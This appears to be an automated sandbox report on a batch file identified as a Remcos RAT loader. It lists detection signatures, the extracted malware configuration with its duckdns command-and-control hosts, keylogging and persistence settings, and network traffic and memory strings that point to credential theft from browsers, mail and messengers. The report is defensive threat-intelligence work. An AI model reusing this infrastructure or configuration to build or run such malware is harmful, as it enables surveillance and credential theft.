Windows Analysis Report
z310517827.bat

Overview

General Information

Sample name:	z310517827.bat
Analysis ID:	1640228
MD5:	d8302b001f73f0f0648a7e00dc2552b5
SHA1:	0b66f1baf0f419881be7ae7f3485621e2b4cbb20
SHA256:	1b3c82f59f90bd345f290cee52f0b80858545abd6fdb8c319ebbe0066a6a39ff
Tags:	batRemcosRATuser-Porcupine
Infos:

Detection

Batch Injector, Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Batch Injector

Yara detected Powershell decode and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: PowerShell Base64 Encoded Invoke Keyword

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Antivirus detection for URL or domain

Source: sarok7lmoutsg5.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg3.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg1.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg4.duckdns.org	Avira URL Cloud: Label: malware
Source: sarok7lmoutsg2.duckdns.org	Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.powershell.exe.8a51288.5.raw.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["sarok7lmoutsg1.duckdns.org:3990:0", "sarok7lmoutsg1.duckdns.org:3991:1", "sarok7lmoutsg2.duckdns.org:3990:0", "sarok7lmoutsg3.duckdns.org:3990:0", "sarok7lmoutsg4.duckdns.org:3990:0", "sarok7lmoutsg5.duckdns.org:3990:0"], "Assigned name": "Year", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "klmiurtg-1R3I3X", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kalmzots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}

Multi AV Scanner detection for submitted file

Source: z310517827.bat

Virustotal: Detection: 9%

Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: powershell.exe, 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_e1a87e25-9

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

Source:

Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_100010F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10006580 FindFirstFileExA,	5_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040B477 FindFirstFileW,FindNextFileW,	12_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49721 -> 176.65.142.140:3990
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 176.65.142.140:3990 -> 192.168.2.4:49721

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sarok7lmoutsg1.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg1.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg2.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg3.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg4.duckdns.org
Source: Malware configuration extractor	URLs: sarok7lmoutsg5.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: sarok7lmoutsg2.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg3.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg5.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg4.duckdns.org
Source: unknown	DNS query: name: sarok7lmoutsg1.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49721 -> 176.65.142.140:3990

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 178.237.33.50 178.237.33.50

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49723 -> 178.237.33.50:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: powershell.exe, 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.facebook.com (Facebook)
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg1.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg3.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg4.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: sarok7lmoutsg5.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro9
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007566000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.00000000075E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp%Mq
Source: powershell.exe, 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpF_
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: powershell.exe, 00000005.00000002.3677060324.0000000007500000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpi
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvFB86.tmp.12.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.3664871938.0000000004F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 00000010.00000003.1560131989.000000000368C000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1559693994.000000000368C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 00000010.00000003.1560131989.000000000368C000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000010.00000003.1559693994.000000000368C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comta
Source: recover.exe, 0000000C.00000002.1572087584.00000000027D3000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000005.00000002.3664871938.0000000004F11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.3664871938.000000000506D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: recover.exe, 0000000C.00000003.1571760999.0000000004781000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000C.00000003.1571871550.0000000004784000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: recover.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000005.00000002.3668466296.0000000005F7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.3676317602.0000000007340000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1560403582.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: recover.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Jump to behavior

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041138D OpenClipboard,GetLastError,DeleteFileW,

12_2_0041138D

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	12_2_00409E39
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	12_2_00409EA1
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	13_2_00406DFC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	13_2_00406E9F
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	16_2_004068B5
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	16_2_004072B5

Yara detected Keylogger Generic

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06AFF3B0 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,	5_2_06AFF3B0
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,	12_2_0040BAE3
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004016FD NtdllDefWindowProc_A,	13_2_004016FD
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_004017B7 NtdllDefWindowProc_A,	13_2_004017B7
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402CAC NtdllDefWindowProc_A,	16_2_00402CAC
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00402D66 NtdllDefWindowProc_A,	16_2_00402D66

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10017194	5_2_10017194
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_1000B5C1	5_2_1000B5C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06AFF3B0	5_2_06AFF3B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07632FE4	5_2_07632FE4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07632F92	5_2_07632F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07631298	5_2_07631298
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0044A030	12_2_0044A030
